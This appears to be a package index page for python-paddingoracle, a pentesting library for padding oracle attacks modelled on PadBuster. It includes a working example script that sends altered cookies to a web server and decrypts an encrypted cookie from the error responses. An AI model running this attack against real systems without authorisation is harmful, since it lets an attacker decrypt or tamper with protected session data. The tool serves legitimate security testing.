Skip to main content

A portable, padding oracle exploit API

Project description

python-paddingoracle is an API that provides pentesters a customizable alternative to PadBuster and other padding oracle exploit tools that can’t easily (without a heavy rewrite) be used in unique, per-app scenarios. Think non-HTTP applications, raw sockets, client applications, unique encodings, etc.

Usage:

To use the paddingoracle API, simply implement the oracle() method from the PaddingOracle API and raise a BadPaddingException when the decrypter reveals a padding oracle. To decrypt data, pass raw encrypted bytes to decrypt() with a block size (typically 8 or 16) and optional iv parameter.

See below for an example (from the example):

from paddingoracle import BadPaddingException, PaddingOracle
from base64 import b64encode, b64decode
from urllib import quote, unquote
import requests
import socket
import time

class PadBuster(PaddingOracle):
    def __init__(self, **kwargs):
        super(PadBuster, self).__init__(**kwargs)
        self.session = requests.Session()
        self.wait = kwargs.get('wait', 2.0)

    def oracle(self, data, **kwargs):
        somecookie = quote(b64encode(data))
        self.session.cookies['somecookie'] = somecookie

        while 1:
            try:
                response = self.session.get('http://www.example.com/',
                        stream=False, timeout=5, verify=False)
                break
            except (socket.error, requests.exceptions.RequestException):
                logging.exception('Retrying request in %.2f seconds...',
                                  self.wait)
                time.sleep(self.wait)
                continue

        self.history.append(response)

        if response.ok:
            logging.debug('No padding exception raised on %r', somecookie)
            return

        # An HTTP 500 error was returned, likely due to incorrect padding
        raise BadPaddingException

if __name__ == '__main__':
    import logging
    import sys

    if not sys.argv[1:]:
        print 'Usage: %s <somecookie value>' % (sys.argv[0], )
        sys.exit(1)

    logging.basicConfig(level=logging.DEBUG)

    encrypted_cookie = b64decode(unquote(sys.argv[1]))

    padbuster = PadBuster()

    cookie = padbuster.decrypt(encrypted_cookie, block_size=8, iv=bytearray(8))

    print('Decrypted somecookie: %s => %r' % (sys.argv[1], cookie))

Credits

python-paddingoracle is a Python implementation heavily based on PadBuster, an automated script for performing Padding Oracle attacks, developed by Brian Holyfield of Gotham Digital Science.

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

paddingoracle-0.2.2.tar.gz (5.3 kB view details)

Uploaded Source

Built Distribution

paddingoracle-0.2.2-py2-none-any.whl (5.6 kB view details)

Uploaded Python 2

File details

Details for the file paddingoracle-0.2.2.tar.gz.

File metadata

  • Download URL: paddingoracle-0.2.2.tar.gz
  • Upload date:
  • Size: 5.3 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No

File hashes

Hashes for paddingoracle-0.2.2.tar.gz
Algorithm Hash digest
SHA256 bfa836e7a9971484f6b44ad61972ed81adc58a1c4d1ecc11e090fa1e8849803d
MD5 f59e537b890a0ba6cbfaa9bd68dc5d50
BLAKE2b-256 748db12a6ce3e5e5f77a2d8513ae4f45b925741e83c5a116f6fbc79f987a5507

See more details on using hashes here.

File details

Details for the file paddingoracle-0.2.2-py2-none-any.whl.

File metadata

File hashes

Hashes for paddingoracle-0.2.2-py2-none-any.whl
Algorithm Hash digest
SHA256 0a2432d8911f9d2e31d261585dba3af571b7d2e71971cb731360a25ccbeda8c2
MD5 eb6224f3fdda27a7b3c6d9f21f7c8541
BLAKE2b-256 4846198eaee3113990344c8260e9fca87e573d83fe08ca24db1d15a59cb3df8f

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page